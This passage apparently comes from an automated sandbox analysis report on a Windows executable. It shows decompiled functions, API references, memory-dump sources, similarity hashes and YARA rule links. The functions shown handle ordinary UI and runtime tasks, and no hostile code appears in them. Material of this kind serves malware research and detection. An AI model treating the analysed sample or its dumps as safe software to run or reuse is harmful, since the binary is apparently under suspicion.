					return E0041E370(_t81);
				}
			}

0x0041efe1
0x0041efe3
0x0041efe9
0x0041efec
0x0041efef
0x0041eff2
0x0041eff6
0x0041eff7
0x0041effc
0x0041efff
0x0041f005
0x0041f00f
0x0041f153
0x0041f156
0x0041f168
0x0041f015
0x0041f015
0x0041f01a
0x0041f021
0x0041f022
0x0041f027
0x0041f02a
0x0041f034
0x0041f040
0x0041f045
0x0041f04a
0x0041f04f
0x0041f059
0x0041f064
0x0041f05b
0x0041f05b
0x0041f05b
0x0041f075
0x0041f082
0x0041f08f
0x0041f098
0x0041f0a4
0x0041f0b8
0x0041f0dd
0x0041f0e8
0x0041f0ba
0x0041f0c2
0x0041f0cd
0x0041f0cd
0x0041f0ed
0x0041f0f1
0x0041f0f5
0x0041f100
0x0041f102
0x0041f10a
0x0041f104
0x0041f106
0x0041f110
0x0041f108
0x0041f116
0x0041f116
0x0041f106
0x0041f126
0x0041f126
0x0041f12b
0x0041f12e
0x0041f131
0x0041f136
0x0041f140
0x0041f140

APIs

Part of subcall function 0041E364: RtlEnterCriticalSection.KERNEL32(?,0041E3A1), ref: 0041E368

CreateFontIndirectA.GDI32(?), ref: 0041F11E

Strings

Default, xrefs: 0041F0AC
MS Sans Serif, xrefs: 0041F0BD

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateCriticalEnterFontIndirectSection
String ID: MS Sans Serif$Default
API String ID: 2931345757-2137701257
Opcode ID: 90fb9a7503d66cdec542eb113d889876bd6839152fc7b273cb32d0b05a32b6e9
Instruction ID: c2368e3b638b58a3088947372bbf6b66c6b3ddf4e0586a3ea95e9af463785673
Opcode Fuzzy Hash: 90fb9a7503d66cdec542eb113d889876bd6839152fc7b273cb32d0b05a32b6e9
Instruction Fuzzy Hash: A0514275A04248DFDB01CFA9C541BCDBBF5AF49304F6580BAD804A7352D3789E4ADB29

Uniqueness

Uniqueness Score: -1.00%

Function 004099F0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106
threadCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E004099F0(void* __ebx, void* __edi, void* __esi) {
				int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t53;
				void* _t54;
				intOrPtr _t80;
				void* _t83;
				void* _t84;
				void* _t86;
				void* _t87;
				intOrPtr _t90;

				_t89 = _t90;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_t90);
				_push(0x409b03);
				_push( *[fs:eax]);
				 *[fs:eax] = _t90;
				_v8 = GetThreadLocale();
				_t53 = 1;
				_t86 = 0x48f758;
				_t83 = 0x48f788;
				do {
					_t3 = _t53 + 0x44; // 0x45
					E004099B4(_t3 - 1, _t53 - 1,  &_v16, 0xb, _t89);
					E00404374(_t86, _v16);
					_t6 = _t53 + 0x38; // 0x39
					E004099B4(_t6 - 1, _t53 - 1,  &_v20, 0xb, _t89);
					E00404374(_t83, _v20);
					_t53 = _t53 + 1;
					_t83 = _t83 + 4;
					_t86 = _t86 + 4;
				} while (_t53 != 0xd);
				_t54 = 1;
				_t87 = 0x48f7b8;
				_t84 = 0x48f7d4;
				do {
					_t8 = _t54 + 5; // 0x6
					asm("cdq");
					_v12 = _t8 % 7;
					E004099B4(_v12 + 0x31, _t54 - 1,  &_v24, 6, _t89);
					E00404374(_t87, _v24);
					E004099B4(_v12 + 0x2a, _t54 - 1,  &_v28, 6, _t89);
					E00404374(_t84, _v28);
					_t54 = _t54 + 1;
					_t84 = _t84 + 4;
					_t87 = _t87 + 4;
				} while (_t54 != 8);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(E00409B0A);
				return E00404344( &_v28, 4);
			}

0x004099f1
0x004099f5
0x004099f6
0x004099f7
0x004099f8
0x004099f9
0x004099fa
0x00409a00
0x00409a01
0x00409a06
0x00409a09
0x00409a11
0x00409a14
0x00409a19
0x00409a1e
0x00409a23
0x00409a32
0x00409a36
0x00409a41
0x00409a55
0x00409a59
0x00409a64
0x00409a69
0x00409a6a
0x00409a6d
0x00409a70
0x00409a75
0x00409a7a
0x00409a7f
0x00409a84
0x00409a84
0x00409a8c
0x00409a8f
0x00409aa7
0x00409ab2
0x00409acc
0x00409ad7
0x00409adc
0x00409add
0x00409ae0
0x00409ae3
0x00409aea
0x00409aed
0x00409af0
0x00409b02

APIs

GetThreadLocale.KERNEL32(00000000,00409B03,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409A0C

Strings

Hv@, xrefs: 00409A99
u@, xrefs: 00409A4D

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: LocaleThread
String ID: Hv@$u@
API String ID: 635194068-936226909
Opcode ID: 8a0450575a709c70558e9ba436eac5fd5543703d4a1339eaa992137f609c94cf
Instruction ID: b1c6a070fb8b54ce91781ebc80038fc09ae59b0137980c5015c0edec2bc75e21
Opcode Fuzzy Hash: 8a0450575a709c70558e9ba436eac5fd5543703d4a1339eaa992137f609c94cf
Instruction Fuzzy Hash: 9E31B675F001085BD704DA59D881AAE77A9EB89314F65843BEA09EB382D73CAD058768

Uniqueness

Uniqueness Score: -1.00%

Function 0044C050, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0044C050(intOrPtr __eax, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t69 = _t71;
				_t72 = _t71 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x48fbf0; // 0x21d0e50
					E004267AC(_t34,  &_v24);
					_push(_t69);
					_push(0x44c14e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					while(1) {
						_v17 = 0;
						_v8 = E0044BD54(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t64);
							 *[fs:eax] = _t64;
							_push(0x44c155);
							_t40 =  *0x48fbf0; // 0x21d0e50
							return E004267A4(_t40);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x48fbf0; // 0x21d0e50
					E004267AC(_t42,  &_v8);
					_push(_t69);
					_push(0x44c123);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					_v17 = E0044BEFC( &_v8, 0, _t69);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x44c12a);
					_t48 =  *0x48fbf0; // 0x21d0e50
					return E004267A4(_t48);
				}
				L14:
			}

0x0044c051
0x0044c053
0x0044c057
0x0044c059
0x0044c063
0x0044c06c
0x0044c16b
0x0044c072
0x0044c07c
0x0044c07e
0x0044c07e
0x0044c08e
0x0044c090
0x0044c090
0x0044c09a
0x0044c09c
0x0044c09c
0x0044c0a8
0x0044c0ae
0x0044c0b3
0x0044c0ba
0x0044c0bb
0x0044c0c0
0x0044c0c3
0x0044c0c6
0x0044c0c6
0x0044c0d8
0x0044c0df
0x00000000
0x00000000
0x0044c12e
0x0044c138
0x0044c13b
0x0044c13e
0x0044c143
0x0044c14d
0x00000000
0x00000000
0x00000000
0x00000000
0x0044c12e
0x0044c0e4
0x0044c0e9
0x0044c0f0
0x0044c0f1
0x0044c0f6
0x0044c0f9
0x0044c108
0x0044c10d
0x0044c110
0x0044c113
0x0044c118
0x0044c122
0x0044c122
0x00000000

APIs

GetKeyState.USER32(00000010), ref: 0044C074
GetKeyState.USER32(00000011), ref: 0044C086

Strings

, xrefs: 0044C096

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: State
String ID:
API String ID: 1649606143-3916222277
Opcode ID: 2b31a51c91225219f7195cdf30feb6174b5ac6c9bf5e3b0e0d172c8c72ed0b58
Instruction ID: f18d7a24cf68b6f9e41b31e0846b9d47448a22b237d844201d9950864949798d
Opcode Fuzzy Hash: 2b31a51c91225219f7195cdf30feb6174b5ac6c9bf5e3b0e0d172c8c72ed0b58
Instruction Fuzzy Hash: 60312934A05304EFEB11DFA9E89179EB7F5EB44304F5584BAEC00A7291E7785E00CA58

Uniqueness

Uniqueness Score: -1.00%

Function 0044BE10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044BE10(void* __eax, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				intOrPtr* _t27;
				intOrPtr _t29;
				void* _t39;
				intOrPtr _t42;
				intOrPtr _t45;
				int _t50;
				void* _t51;

				_t51 = __eax;
				_t39 = 0;
				_t50 = E0044BD54(__eax, 1, __edx);
				if(_t50 == 0) {
					if(( *(_t51 + 0x1c) & 0x00000010) == 0) {
						_t45 =  *0x447c9c; // 0x447ce8
						if(E00403740(_t51, _t45) != 0) {
							E0044AE28( *((intOrPtr*)(_t51 + 0x34)));
						}
					}
				} else {
					if(( *(_t50 + 0x1c) & 0x00000010) == 0) {
						E0044AE28(_t50);
					}
					 *((intOrPtr*)( *_t50 + 0x44))();
					_t24 = E0044B4C0(_t50, _t39, 0, _t50, _t51);
					if((_t24 | E0044B9BC(_t50, 0)) != 0) {
						E00448E98(_t50, 0);
					}
					_t27 =  *0x48e6ec; // 0x48fbfc
					_t29 =  *((intOrPtr*)( *_t27 + 0x44));
					if(_t29 != 0) {
						_t42 = _t29;
						if( *((char*)(_t42 + 0x22f)) == 2 && _t50 ==  *((intOrPtr*)(_t42 + 0x258)) && SendMessageA( *(_t42 + 0x254), 0x234, 0, 0) != 0) {
							DrawMenuBar(E0043F370(_t42));
						}
					}
					_t39 = 1;
				}
				return _t39;
			}

0x0044be13
0x0044be15
0x0044be20
0x0044be24
0x0044beb4
0x0044beb8
0x0044bec5
0x0044beca
0x0044beca
0x0044bec5
0x0044be2a
0x0044be2e
0x0044be32
0x0044be32
0x0044be3b
0x0044be42
0x0044be56
0x0044be5a
0x0044be5a
0x0044be5f
0x0044be66
0x0044be6b
0x0044be73
0x0044be7c
0x0044bea7
0x0044bea7
0x0044be7c
0x0044beac
0x0044beac
0x0044bed4

APIs

SendMessageA.USER32(?,00000234,00000000,00000000), ref: 0044BE96
DrawMenuBar.USER32(00000000,?,00000234,00000000,00000000), ref: 0044BEA7

Strings

|D, xrefs: 0044BEB8

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: DrawMenuMessageSend
String ID: |D
API String ID: 2625368238-369764335
Opcode ID: 70dfe488819a9491418697602775c2a484eae7f937bf019f87f482e07ef9934c
Instruction ID: dad02bc1c52e2e342e2c386163c0c1e1ac5888164989db89b463077781986b60
Opcode Fuzzy Hash: 70dfe488819a9491418697602775c2a484eae7f937bf019f87f482e07ef9934c
Instruction Fuzzy Hash: B91172717006004BE711EA3A8C8579A67969FC9308F28447ABA04DB392DB7CEC0687C9

Uniqueness

Uniqueness Score: -1.00%

Function 00439078, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00439078(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E0041412C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E004140D0(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E0043865C(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}

0x00439081
0x0043908e
0x004390a1
0x004390a5
0x004390f5
0x004390f5
0x004390a7
0x004390a7
0x004390a7
0x004390b1
0x004390b7
0x00000000
0x004390bf
0x004390c4
0x004390d8
0x004390ef
0x00000000
0x00000000
0x004390ef
0x00000000
0x004390f1
0x004390f1
0x00000000
0x004390a7
0x004390f9
0x00439102

APIs

IntersectRect.USER32 ref: 004390D8
EqualRect.USER32 ref: 004390E8

Strings

@, xrefs: 004390B9

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$EqualIntersect
String ID: @
API String ID: 3291753422-2766056989
Opcode ID: 85263df399f3c055a5ac233aa09b8fac6764581a626922a7c32205e358554927
Instruction ID: b3658ca63b3f77c0b2e9cb8c915faf6aaf92240209934cfd59e43f7126a4f57e
Opcode Fuzzy Hash: 85263df399f3c055a5ac233aa09b8fac6764581a626922a7c32205e358554927
Instruction Fuzzy Hash: C1115E31A042485BC711DAADC885BDFBBE89F49318F044296FD05EB382D7B9DE4987D4

Uniqueness

Uniqueness Score: -1.00%

Function 00426B14, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00426B14(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x48fabe != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x48fa9c; // 0x426b14
					 *0x48fa9c = E004269A4(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x48fa9c(_t14, _t17);
				}
				return _t19;
			}

0x00426b1a
0x00426b1d
0x00426b27
0x00426b4c
0x00426b55
0x00426b7c
0x00426b7c
0x00426b29
0x00426b2e
0x00426b3b
0x00426b48
0x00426b48
0x00426b87

APIs

GetSystemMetrics.USER32 ref: 00426B65
GetSystemMetrics.USER32 ref: 00426B71

Part of subcall function 004269A4: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426A24

Strings

MonitorFromRect, xrefs: 00426B29

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromRect
API String ID: 1792783759-4033241945
Opcode ID: 1c0b52c7aa5e9bb5f014eafe9e8f2203fc25de002f4f753f59633a2db975ffaa
Instruction ID: 6ec67903faf7042e990e768622a164a314714ab173c30a0d504f61f69f203353
Opcode Fuzzy Hash: 1c0b52c7aa5e9bb5f014eafe9e8f2203fc25de002f4f753f59633a2db975ffaa
Instruction Fuzzy Hash: 8501A2327001369BDB108B44F886B1ABB55D740775F85847BED0CCBA02C778EC448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00440D80, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00440D80(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				void* _t22;
				void* _t28;

				_v8 = __ecx;
				_t28 = __eax;
				_t22 = 0;
				if(E00445BB0(__eax) != 0) {
					_t32 = __edx -  *((intOrPtr*)(_t28 + 0x6c));
					if(__edx !=  *((intOrPtr*)(_t28 + 0x6c))) {
						E00440DE4(_t28, _t32);
						 *((intOrPtr*)(_t28 + 0x6c)) = __edx;
						_t5 =  &_a4; // 0x436d78
						E00440B70(__edx,  *_t5, _v8,  &_v16);
						_t7 =  &_v12; // 0x436d78
						_push( *_t7);
						_push(_v16);
						_push( *((intOrPtr*)(_t28 + 0x6c)));
						L0042691C();
						asm("sbb ebx, ebx");
						_t22 = __edx + 1;
					}
				}
				return _t22;
			}

0x00440d89
0x00440d8e
0x00440d90
0x00440d9b
0x00440d9d
0x00440da0
0x00440da4
0x00440dab
0x00440db2
0x00440dba
0x00440dbf
0x00440dc2
0x00440dc6
0x00440dca
0x00440dcb
0x00440dd3
0x00440dd5
0x00440dd5
0x00440da0
0x00440dde

APIs

Part of subcall function 00440DE4: 734518F0.COMCTL32(?,00000000,00440DA9,00000000,00000000,00000000), ref: 00440DFC

Part of subcall function 00440B70: ClientToScreen.USER32(?,00440E2C), ref: 00440B88
Part of subcall function 00440B70: GetWindowRect.USER32 ref: 00440B92

73451850.COMCTL32(?,?,xmC,?,00000000,00000000,00000000), ref: 00440DCB

Strings

xmC, xrefs: 00440DBF, 00440DC2
xmC, xrefs: 00440DB2

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 73451873451850ClientRectScreenWindow
String ID: xmC$xmC
API String ID: 1718620977-2749791086
Opcode ID: 54bd9ec976ea2e778cc55838d3fda6531665e7fa2c232a98364c7cff0efd7e8f
Instruction ID: 470f62bafd84657a7bf07c7114de4341cdf3a7ae99cd49e90459aeb749180ee4
Opcode Fuzzy Hash: 54bd9ec976ea2e778cc55838d3fda6531665e7fa2c232a98364c7cff0efd7e8f
Instruction Fuzzy Hash: 11F04FB2B00508AB9B10DEDE8CC189EF3ACFB49214B10417BBA18D3301D675AE148794

Uniqueness

Uniqueness Score: -1.00%

Function 00448FC8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00448FC8(void* __eax) {
				void* _t16;
				intOrPtr _t17;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x34)) == 0) {
					_t17 =  *0x447c9c; // 0x447ce8
					if(E00403740( *((intOrPtr*)(__eax + 4)), _t17) == 0) {
						 *((intOrPtr*)(_t16 + 0x34)) = CreateMenu();
					} else {
						 *((intOrPtr*)(_t16 + 0x34)) = CreatePopupMenu();
					}
					if( *((intOrPtr*)(_t16 + 0x34)) == 0) {
						E0044807C();
					}
					E00448D64(_t16);
				}
				return  *((intOrPtr*)(_t16 + 0x34));
			}

0x00448fc9
0x00448fcf
0x00448fd4
0x00448fe1
0x00448ff2
0x00448fe3
0x00448fe8
0x00448fe8
0x00448ff9
0x00449000
0x00449000
0x00449007
0x00449007
0x00449010

APIs

CreatePopupMenu.USER32(?,00448CDB,00000000,00000000,00448D1F), ref: 00448FE3
CreateMenu.USER32(?,00448CDB,00000000,00000000,00448D1F), ref: 00448FED

Strings

|D, xrefs: 00448FD4

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateMenu$Popup
String ID: |D
API String ID: 257293969-369764335
Opcode ID: 175400f916fd049017c829ea69ecdb06d0893ea4f299a6e6343027bb7d3e1c8d
Instruction ID: ae0e4bcc48897c05312c9a3f088783d237564c6e00bd86ed14947833835e0a4d
Opcode Fuzzy Hash: 175400f916fd049017c829ea69ecdb06d0893ea4f299a6e6343027bb7d3e1c8d
Instruction Fuzzy Hash: E2E0C9B0602100CBEB50AF26D5C161A3BA9AB08308F4064AEA9055F257CB79D885871C

Uniqueness

Uniqueness Score: -1.00%

Function 00435EA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00435EA0(intOrPtr __eax) {
				intOrPtr _t5;
				intOrPtr _t10;
				intOrPtr _t11;

				_t10 = __eax;
				ReleaseCapture();
				_t5 = 0;
				 *0x471990 = 0;
				if(_t10 != 0) {
					_t11 =  *0x434e14; // 0x434e60
					_t5 = E00403740(_t10, _t11);
					if(0 != 0) {
						L4:
						return SetCapture(E0043F370(_t10));
					}
					if( *((intOrPtr*)(_t10 + 0x30)) != 0) {
						 *0x471990 = _t10;
						_t10 =  *((intOrPtr*)(_t10 + 0x30));
						goto L4;
					}
				}
				return _t5;
			}

0x00435ea1
0x00435ea3
0x00435ea8
0x00435eaa
0x00435eb1
0x00435eb5
0x00435ebb
0x00435ec2
0x00435ed3
0x00000000
0x00435edb
0x00435ec8
0x00435eca
0x00435ed0
0x00000000
0x00435ed0
0x00435ec8
0x00435ee1

APIs

ReleaseCapture.USER32(00000000,00438F19,0000FFB8,?,00462506), ref: 00435EA3
SetCapture.USER32(00000000,00000000,00438F19,0000FFB8,?,00462506), ref: 00435EDB

Strings

`NC, xrefs: 00435EB5

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Capture$Release
String ID: `NC
API String ID: 1520983071-918118547
Opcode ID: b85d66c93e12e83c2bfffce08f8152cbb9d144816137039291df0b714677608e
Instruction ID: ed97f3f78fc21c378f8b6ef23837cb0e45adc9d6c1dbb0d4e98436b8d169363f
Opcode Fuzzy Hash: b85d66c93e12e83c2bfffce08f8152cbb9d144816137039291df0b714677608e
Instruction Fuzzy Hash: E1E04FF061070047CB50AF7AD8C22132298BB4C345F80217AAD08973A2D77CD989C61C

Uniqueness

Uniqueness Score: -1.00%

Function 00436A80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00436A80(struct tagPOINT* __eax) {
				struct HWND__* _t8;
				void* _t9;

				_push(__eax->y);
				_t8 = WindowFromPoint( *__eax);
				if(_t8 != 0) {
					while(E00436A38(_t8, _t9) == 0) {
						_t8 = GetParent(_t8);
						if(_t8 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				return _t8;
			}

0x00436a81
0x00436a8b
0x00436a8f
0x00436a91
0x00436aa2
0x00436aa6
0x00000000
0x00000000
0x00000000
0x00436aa6
0x00436a91
0x00436aa8
0x00436aab

APIs

WindowFromPoint.USER32(iiC,?,00000000,00436662,?,0048FB90,?), ref: 00436A86

Part of subcall function 00436A38: GlobalFindAtomA.KERNEL32 ref: 00436A4C
Part of subcall function 00436A38: GetPropA.USER32 ref: 00436A63

GetParent.USER32(00000000), ref: 00436A9D

Strings

iiC, xrefs: 00436A84

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AtomFindFromGlobalParentPointPropWindow
String ID: iiC
API String ID: 3524704154-3819825529
Opcode ID: 02aa3e4fa4b1554d88ae2329db57164ebe9a328072c93d76f6589d099d5d56e2
Instruction ID: decc06476659a983144d3a70f900a89e14417d2836ec137dd71b04f47f17c098
Opcode Fuzzy Hash: 02aa3e4fa4b1554d88ae2329db57164ebe9a328072c93d76f6589d099d5d56e2
Instruction Fuzzy Hash: 89D092613003072BAF113AAA8CC192A26885F2B319B52E47FBA017A263DE69CC185318

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mcsrXx9lfD.exe PID: 7100 Parent PID: 7076 mcsrXx9lfD.exeCOMMON

Executed Functions

Function 00785598, Relevance: 2.3, Strings: 1, Instructions: 1064COMMON

Download Yara Rule

Strings

\k, xrefs: 007857A9

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID: \k
API String ID: 0-1520239229
Opcode ID: 39cff1a1741592f8b2f6025acbab81de5f68ae286e317e58ad747f8938c067d5
Instruction ID: 41a7af5ec53aa2e3adf9a05d7d58ef86fe8b5f1a69557d13c6d4a4055f7be684
Opcode Fuzzy Hash: 39cff1a1741592f8b2f6025acbab81de5f68ae286e317e58ad747f8938c067d5
Instruction Fuzzy Hash: 05724630B446549FEB16AB38C89536E7FE2AF81310F248469D146DB3E2CA3CED46C791

Uniqueness

Uniqueness Score: -1.00%

